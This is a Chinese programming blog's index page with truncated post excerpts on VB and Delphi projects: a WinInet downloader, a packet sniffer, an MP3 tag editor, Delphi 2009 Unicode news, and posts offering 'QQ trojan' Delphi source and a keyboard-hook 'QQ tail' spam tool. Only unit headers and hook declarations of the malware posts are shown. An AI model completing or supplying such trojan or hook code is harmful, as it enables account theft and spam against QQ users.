预览模式: 普通 | 列表
下面是主要实现代码,支持事件,用起来非常爽的

Option Explicit
Private Declare Function InternetOpen Lib "wininet.dll" _
    Alias "InternetOpenA" _
    (ByVal lpszCallerName As String, _

查看更多...

Tags: WininetDown vbdown http下载 饶过防盗链

分类:原创作品 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 2206

用vb写的一个sniffer,抓包程序

很久以前的东西了,打开后点一下按扭会在程序所在文件夹下生成一个1.txt文件,用来存放抓包的数据


下载地址
http://17benteng.com/Codes/vb/Benteng_Sniffer2.rar

Tags: sniffer 抓包

分类:原创作品 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1424

一个修改wma,mp3标签的vb程序,含源码


可修改
Title,Artist,Album,Writer,Composer,Lyrics,Description

Title
Artist

查看更多...

Tags: wma标签 mp3标签

分类:原创作品 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1553

Delphi2009(Tiburon)彻底解决Unicode(图)

If you are a "non-Unicode Kind of Person" like I was just a few short months ago, one of the things that you’ll likely want to do if you want to get into the full features of Tiburon is get your system ready to handle the variety of non-Arabic alphabet fonts that are out there. Many ANSI-type folks probably haven’t installed the Supplemental Language Support for Windows. If you want to be able to view and use Japanese, Chinese, Arabic, and other alphabets in your Code Editor, you’ll need to install that support. if you don’t, you might end up with code that looks like this:



Those boxes are supposed to be Japanese, Chinese, and Russian characters, but since the full language support isn’t installed on the machine where this screen shot was taken, it displays the boxes instead of the actual characters.

查看更多...

Tags: Delphi2009 Tiburon Unicode

分类:业界动态 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1599
最近在David I等大大的博客上,还有易博龙的网站看到最多的词就是

Tiburon
这个开发代号的Delphi,C++Builder等的Codegear Studio 2008,被大家习惯的称为Delphi 2008,C++ Builder 2008。

然而这一切在新东家易博龙接手了Codegear后似乎大有改变。

查看更多...

Tags: delphi 2009 Tiburon 易博龙 David I

分类:业界动态 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1392

QQ木马delphi源码

unit GCommonMethods;

{$I Complier.inc}

interface

查看更多...

Tags: QQ木马

分类:技术文章 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1147

delphi,实现QQ尾巴钓子

uses
Windows,SysUtils,Messages,Registry,ShlObj,Types,Classes;
const
LLKHF_ALTDOWN =KF_ALTDOWN shr 8;
WH_KEYBOARD_LL=13; //钩子种类,表示是低级键盘钩子

查看更多...

Tags: QQ尾巴

分类:技术文章 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1302